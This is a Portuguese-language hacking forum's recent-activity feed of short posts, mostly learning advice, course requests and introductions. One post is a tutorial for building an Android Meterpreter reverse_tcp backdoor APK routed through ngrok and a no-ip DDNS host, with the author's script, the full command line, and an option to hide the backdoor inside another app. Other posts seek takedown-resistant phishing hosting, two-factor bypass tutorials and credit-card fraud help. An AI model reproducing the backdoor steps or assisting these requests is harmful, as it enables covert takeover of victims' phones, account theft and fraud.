Ir para conteúdo

Todas Atividades

Atualizada automaticamente     

  1. Recentemente
  2. Today
  3. Essa aqui é pro pessoal que fica perdido na hora de fazer o scanning em uma rede ou não sabe onde pegar informações sobre a empresa que esta fazendo pentest no momento, acabei criando um menu em perl com algumas das ferramentas que eu uso no dia a dia para information gathering e scanning, tome apenas cuidado pois algumas dessas ferramentas faz contato ativo com o alvo, mas após uma pequena pesquisa você consegue usar facilmente a tool! Meu GitHub com o repositório
  4. Yesterday
  5. Estava precisando do curso Machine Learning da Alura, alguém possui?
  6. Estava precisando do curso machine learning da Alura, alguém possui?
  7. Última semana
  8. zeromfl1

    Por onde começar?

    Boa tarde, vou passar alguns conhecimentos que me ajudaram a ter um melhor entendimento desta área que tanto amo : Básico de Rede { Protocolo de proteção(por exemplo tls) Servidores (Firewall,DHcp,Log,...) IP((externo, interno)) } Programação te recomendo começar com python(na minha opinião ele é mais fácil o aprendizado) mas se você já esta familiarizado mais com linux ou pretendendo estudar mais sobre, indico o shell script muito ótimo para automatização de comandos no linux Exemplo de Shell Script: Você pode criar um script que baixe o index de um site e ainda que já faça o filtro de informações, pode filtrar por links ou nomes ou então fazer um script para montar uma Word list(uma lista de possíveis senhas do usuário) e então a executa-la Linux é muito importante, principalmente em rede, você pode se deparar com servidores com Kernel linux ou ate mesmo terminais de usuário em Kernel linux. Apos estar com os conceitos básicos fixado na cabeça ai você pode ir atrás para estudo de Segurança a informação que aborda: Pentest, técnicas Florence, blindagem de servidor entre outros. ***OBS: Esta é uma área muito grande, tendo assim muitos caminhos diferentes para se trabalhar te recomendo estudar linux muito importante também nesta área. \\ Se você esta perdido, volte ao começo de tudo
  9. Literalmente longa ein kkkk Seja bem vindo! o/ Um bom pensamento é: Aprenda você mesmo e gaste o dinheiro com outra coisa kkkk Claro que não vai ser da noite para o dia, mas se esforçando, tu chega lá. Boa sorte.
  10. Dá uma olhada nisso aqui: Download (Do site da Microsoft ainda kkkk) Se não lhe servir, ache outro por torrent, só pesquisar que tu acha ;)
  11. Busco site para baixar a iso do windows server 2008, mais ao que parece não esta disponível na internet.
  12. Obrigado pelo post. Sou novato e ja levei preju. Você me indica alguém de confiança? Obrigado.
  13. Anteriormente
  14. Um problema recorrente durante minhas invasões foi que por eu morar em uma grande metropole, não tenho um IP fixo, com isso não consigo abrir uma porta de meu roteador apenas para mim, para contornar esse problema resolvi usar o NGROK que abre uma porta no servidor dele trazendo diretamente até meu localhost. O problema parecia ter sido resolvido, até eu notar que a porta criada pelo NGROK mudava constantemente, então resolvi esse problema com uma simples adição de um DDNS que redireciona para o IP e porta do NGROK, o serviço que uso atualmente é o NOIP que vem sendo ótimo para as minhas nessecidades. Mas então eu notei outro problema, criar payloads assim exige um conhecimento e lógica um pouco avançados, então resolvi fazer esse tutorial, voce tera que ter apenas um computador com kali linux instalado e o programa NGROK, junto claro do metasploit. -Para começar entraremos no site do NGROK e baixaremos seu executavel, esperando que voces tenham um conhecimento prévio sobre linux vou pular a instalação. -Após instalar iremos executar o comando: "ngrok authtoken <Seu token>". O token pode ser facilmente achado no site do NGROK -Depois do ngrok configurado iremos abrir uma porta com o simples comando: "ngrok tcp 8080", assim ele nos fornecera uma url com uma porta qualquer apontando para uma no localhost:8080 Ficara mais ou menos assim: Session Status online Account Jocelin Flores(Plan: Free) Version 2.2.8 Region United States (us) Web Interface http://127.0.0.1:4040 Forwarding tcp://0.tcp.ngrok.io:13200 -> localhost:8080 Connections ttl opn rt1 rt5 p50 p90 0 0 0.00 0.00 0.00 0.00 -Agora criaremos uma conta no https://www.noip.com/ -Após sua conta estar criada iremos na aba My service e em DNS record. -Clique em ADD hostname no canto inferior. -defina o hostname que voce quiser. -E defina a configuração como Port 80 redirect. -agora iremos pegar a url do ngrok e a transformaremos num ip, normalmente é essa: 52.14.61.47. Mas sempre é bom verificar. -Defina a porta que esta após a URL em fowarding, isso se encontra na interface do ngrok . -Adicione o hostname e deixe o noip aberto. -Após isso iremos voltar para o terminal. -Voce pode tanto fazer a mão quanto baixar o meu script daqui, mas ensinarei do script. -Entre no github e baixe, extraia em alguma pasta o arquivo que esta nomeado como backdoor arquivo: https://github.com/Doctorspeppers/scripts_perl -Após isso tente executar o comando: perl backdoor -h -Se der erro não se assuste, apenas de um: apt-get install perl -y -Após isso se aparecer as informações e comandos do arquivo esta tudo ok. -Usaremos a vertente "perl backdoor -i", pois ela esta definida para ser usada com DDNS. -de o comando: backdoor -i <exploit> <ip/ddns> <port> <ngroklocalport> <apkout> -Legenda: <exploit> = Payload que deseja usar. <ip/ddns> = seu ddns que voce definiu no hostname la em cima. <port> = essa sempre sera 80 no no-ip por aquela configuração, mas se usar outro DDNS troque para a que voce escolheu. <ngrocklocalport> = A sua porta que voce definiu no ngrok, aqui no caso a 8080. <apkout> = aonde voce quer despejar o seu backdoor com o nome dele. -Fim da legenda- -No meu caso aqui seria assim o comando: perl backdoor -i android/meterpreter/reverse_tcp doctorspeppers.ddns.net 80 8080 /root/backdoors/test.apk -Isso claro para um backdoor em um android. -tambem é possivel usar o "perl backdoor -i -x" que faz com que voce possa mesclar o backdoor com outro app. -note que ao voce colocar o "-x" voce adiciona depois a localidade do app, de resto continua normal. Edit1: Toda vez que voce abrir o NGROK para entrar no backdoor, atualize a porta no DDNS e espere 5 minutos Edit2: Sim, é possivel utilizar 2 NGROKS em diferentes diretorios instalados para utilizar + de 1 interface do metasploit Vou responder as duvidas desse topico por 1 mês e atualizar o script a cada semana, bom aprendizado a todos ^-^
  15. o escondido se não me engano tu só adiciona um /Y ali que ele faz sem pedir
  16. Quero upar um phishing, quero um serviço de hospedagem que não derrube a tela tão rápido... (pode ser hosp. paga e free)
  17. Quando fazer posta o link dele aqui
  18. SmX

    Fake AP na universidade

    Vou tentar fazer um tutorial gente, tava MT tempo sem entrar no forum
  19. É de conhecimento de todos que infelizmente o MinhaTeca foi derrubado, eu queria saber se vocês que hospedavam seus arquivos nesse site, teriam feito backup em outro local também, como o MEGA por exemplo, se sim por favor me enviem o Link desses cursos.
  20. faz tutorial de como driblar autenticação de dois fatores
  21. Esse site parece que está fora do ar.
  22. A maioria não funciona mais, teria outros? Fiquei interessado em aprender sobre cc e aprovação
  23. E aí, beleza? Passando aqui só pra me apresentar. Sou 085_Kcl, estou aprendendo a programar faz um tempo, mas nunca terminei um curso devido a falta de tempo. Iniciei java, java script, php, mysql e tudo fiz por conta própria baixando apostilas. Sempre me interessei pela área de tecnologia apesar de no momento não estar seguindo a vida acadêmica nessa área, entretanto estou sempre estudando sobre. Sou fascinado por hackers e crackers, principalmente engenharia social. Entrei no fórum oficialmente para obter mais conhecimento, sempre li o fórum mas nunca me cadastrei, espero aprender muito aqui. Meu apelido vem de um código em ASCII correspondente a letra U, que retirei de Uracil e Kcl por cloreto de potássio, ou seja, nada que faça sentido kkkkkkk.
  24. Nenhum link está funcionando pra mim!
  1. Mais Resultados


×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.